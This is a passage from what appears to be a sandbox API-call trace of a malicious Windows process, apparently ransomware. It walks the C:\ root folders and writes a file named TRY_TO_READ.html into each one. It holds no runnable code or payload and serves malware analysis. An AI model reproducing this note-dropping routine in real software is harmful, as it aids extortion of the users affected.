dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.376] WriteFile (in: hFile=0x3d0, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.377] WriteFile (in: hFile=0x3d0, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.377] WriteFile (in: hFile=0x3d0, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.377] CloseHandle (hObject=0x3d0) returned 1 [0116.377] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.377] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a18 | out: hHeap=0x2e0000) returned 1 [0116.377] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3309f8 | out: hHeap=0x2e0000) returned 1 [0116.377] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a8f0 | out: hHeap=0x2e0000) returned 1 [0116.377] FindNextFileW (in: hFindFile=0x317348, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x36, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0116.377] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.377] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.377] GetLastError () returned 0x0 [0116.377] SetLastError (dwErrCode=0x0) [0116.377] GetLastError () returned 0x0 [0116.377] SetLastError (dwErrCode=0x0) [0116.377] GetLastError () returned 0x0 [0116.377] SetLastError (dwErrCode=0x0) [0116.377] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344570 [0116.378] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.378] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.378] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344570 | out: hHeap=0x2e0000) returned 1 [0116.378] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a8f0 [0116.378] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a918 [0116.378] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x18) returned 0x3431b0 [0116.378] FindNextFileW (in: hFindFile=0x317348, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x36, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0116.378] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.378] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.378] GetLastError () returned 0x0 [0116.378] SetLastError (dwErrCode=0x0) [0116.378] GetLastError () returned 0x0 [0116.378] SetLastError (dwErrCode=0x0) [0116.378] GetLastError () returned 0x0 [0116.378] SetLastError (dwErrCode=0x0) [0116.378] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a940 [0116.378] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344570 [0116.378] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.378] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.378] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344570 | out: hHeap=0x2e0000) returned 1 [0116.378] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a940 | out: hHeap=0x2e0000) returned 1 [0116.378] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344570 [0116.378] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x18) returned 0x3431d0 [0116.378] FindNextFileW (in: hFindFile=0x317348, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x36, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0116.378] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.378] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.378] GetLastError () returned 0x0 [0116.378] SetLastError (dwErrCode=0x0) [0116.378] GetLastError () returned 0x0 [0116.378] SetLastError (dwErrCode=0x0) [0116.378] GetLastError () returned 0x0 [0116.378] SetLastError (dwErrCode=0x0) [0116.378] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a940 [0116.378] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a968 [0116.378] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a940 | out: hHeap=0x2e0000) returned 1 [0116.379] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a968 | out: hHeap=0x2e0000) returned 1 [0116.379] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a968 [0116.379] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a940 [0116.379] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34dea0 [0116.379] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x3309f8 [0116.379] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a18 [0116.379] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.379] GetLastError () returned 0x0 [0116.379] SetLastError (dwErrCode=0x0) [0116.379] GetLastError () returned 0x0 [0116.379] SetLastError (dwErrCode=0x0) [0116.379] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.379] CreateFileW (lpFileName="C:\\\\Config.Msi\\TRY_TO_READ.html" (normalized: "c:\\config.msi\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.380] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.380] WriteFile (in: hFile=0x3d0, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.380] WriteFile (in: hFile=0x3d0, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.381] WriteFile (in: hFile=0x3d0, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.381] CloseHandle (hObject=0x3d0) returned 1 [0116.381] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.381] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a18 | out: hHeap=0x2e0000) returned 1 [0116.381] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3309f8 | out: hHeap=0x2e0000) returned 1 [0116.381] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34dea0 | out: hHeap=0x2e0000) returned 1 [0116.381] FindNextFileW (in: hFindFile=0x317348, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0116.381] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.381] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.381] GetLastError () returned 0x0 [0116.381] SetLastError (dwErrCode=0x0) [0116.381] GetLastError () returned 0x0 [0116.381] SetLastError (dwErrCode=0x0) [0116.381] GetLastError () returned 0x0 [0116.381] SetLastError (dwErrCode=0x0) [0116.381] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0116.381] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3445a8 [0116.381] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0116.381] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3445a8 | out: hHeap=0x2e0000) returned 1 [0116.381] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.381] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34dea0 [0116.382] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.382] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x3309f8 [0116.382] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a18 [0116.382] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.382] GetLastError () returned 0x0 [0116.382] SetLastError (dwErrCode=0x0) [0116.382] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328578 [0116.382] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.382] GetLastError () returned 0x0 [0116.382] SetLastError (dwErrCode=0x0) [0116.382] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x338758 [0116.382] CreateFileW (lpFileName="C:\\\\Documents and Settings\\TRY_TO_READ.html" (normalized: "c:\\documents and settings\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.383] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338758 | out: hHeap=0x2e0000) returned 1 [0116.383] WriteFile (in: hFile=0x3d0, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.384] WriteFile (in: hFile=0x3d0, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.384] WriteFile (in: hFile=0x3d0, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.384] CloseHandle (hObject=0x3d0) returned 1 [0116.384] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328578 | out: hHeap=0x2e0000) returned 1 [0116.384] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a18 | out: hHeap=0x2e0000) returned 1 [0116.384] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3309f8 | out: hHeap=0x2e0000) returned 1 [0116.384] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.384] FindNextFileW (in: hFindFile=0x317348, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x813b7be0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0116.384] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.384] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.384] GetLastError () returned 0x0 [0116.384] SetLastError (dwErrCode=0x0) [0116.384] GetLastError () returned 0x0 [0116.384] SetLastError (dwErrCode=0x0) [0116.384] GetLastError () returned 0x0 [0116.384] SetLastError (dwErrCode=0x0) [0116.384] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34dec8 [0116.384] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3445a8 [0116.384] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.385] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.385] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3445a8 | out: hHeap=0x2e0000) returned 1 [0116.385] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34dec8 | out: hHeap=0x2e0000) returned 1 [0116.385] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3445a8 [0116.385] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x18) returned 0x3431f0 [0116.385] FindNextFileW (in: hFindFile=0x317348, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0116.385] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.385] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.385] GetLastError () returned 0x0 [0116.385] SetLastError (dwErrCode=0x0) [0116.385] GetLastError () returned 0x0 [0116.385] SetLastError (dwErrCode=0x0) [0116.385] GetLastError () returned 0x0 [0116.385] SetLastError (dwErrCode=0x0) [0116.385] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34dec8 [0116.385] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34def0 [0116.385] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34dec8 | out: hHeap=0x2e0000) returned 1 [0116.385] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34def0 | out: hHeap=0x2e0000) returned 1 [0116.385] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34def0 [0116.385] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34dec8 [0116.385] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34df18 [0116.385] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x3309f8 [0116.385] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a18 [0116.385] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.385] GetLastError () returned 0x0 [0116.385] SetLastError (dwErrCode=0x0) [0116.385] GetLastError () returned 0x0 [0116.385] SetLastError (dwErrCode=0x0) [0116.385] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.385] CreateFileW (lpFileName="C:\\\\MSOCache\\TRY_TO_READ.html" (normalized: "c:\\msocache\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.386] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.386] WriteFile (in: hFile=0x3d0, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.387] WriteFile (in: hFile=0x3d0, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.387] WriteFile (in: hFile=0x3d0, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.387] CloseHandle (hObject=0x3d0) returned 1 [0116.387] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.387] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a18 | out: hHeap=0x2e0000) returned 1 [0116.387] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3309f8 | out: hHeap=0x2e0000) returned 1 [0116.387] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34df18 | out: hHeap=0x2e0000) returned 1 [0116.387] FindNextFileW (in: hFindFile=0x317348, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x925f0e70, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0116.387] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.387] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.387] GetLastError () returned 0x0 [0116.387] SetLastError (dwErrCode=0x0) [0116.387] GetLastError () returned 0x0 [0116.387] SetLastError (dwErrCode=0x0) [0116.387] GetLastError () returned 0x0 [0116.387] SetLastError (dwErrCode=0x0) [0116.388] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34df18 [0116.388] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0116.388] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.388] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.388] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0116.388] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34df18 | out: hHeap=0x2e0000) returned 1 [0116.388] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0116.388] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x18) returned 0x343210 [0116.388] FindNextFileW (in: hFindFile=0x317348, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0116.388] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.388] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.388] GetLastError () returned 0x0 [0116.388] SetLastError (dwErrCode=0x0) [0116.388] GetLastError () returned 0x0 [0116.388] SetLastError (dwErrCode=0x0) [0116.388] GetLastError () returned 0x0 [0116.388] SetLastError (dwErrCode=0x0) [0116.388] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34df18 [0116.388] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34df40 [0116.388] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34df18 | out: hHeap=0x2e0000) returned 1 [0116.388] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34df40 | out: hHeap=0x2e0000) returned 1 [0116.388] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34df40 [0116.388] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34df18 [0116.388] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34df68 [0116.388] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x3309f8 [0116.388] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a18 [0116.388] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.388] GetLastError () returned 0x0 [0116.388] SetLastError (dwErrCode=0x0) [0116.388] GetLastError () returned 0x0 [0116.388] SetLastError (dwErrCode=0x0) [0116.388] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.389] CreateFileW (lpFileName="C:\\\\PerfLogs\\TRY_TO_READ.html" (normalized: "c:\\perflogs\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.389] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.389] WriteFile (in: hFile=0x3d0, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.390] WriteFile (in: hFile=0x3d0, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.390] WriteFile (in: hFile=0x3d0, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.390] CloseHandle (hObject=0x3d0) returned 1 [0116.390] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.390] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a18 | out: hHeap=0x2e0000) returned 1 [0116.390] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3309f8 | out: hHeap=0x2e0000) returned 1 [0116.390] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34df68 | out: hHeap=0x2e0000) returned 1 [0116.390] FindNextFileW (in: hFindFile=0x317348, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f2ba270, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x5f2ba270, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0116.391] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.391] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.391] GetLastError () returned 0x0 [0116.391] SetLastError (dwErrCode=0x0) [0116.391] GetLastError () returned 0x0 [0116.391] SetLastError (dwErrCode=0x0) [0116.391] GetLastError () returned 0x0 [0116.391] SetLastError (dwErrCode=0x0) [0116.391] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34df68 [0116.391] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34df90 [0116.391] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34df68 | out: hHeap=0x2e0000) returned 1 [0116.391] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34df90 | out: hHeap=0x2e0000) returned 1 [0116.391] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3445e0 [0116.391] 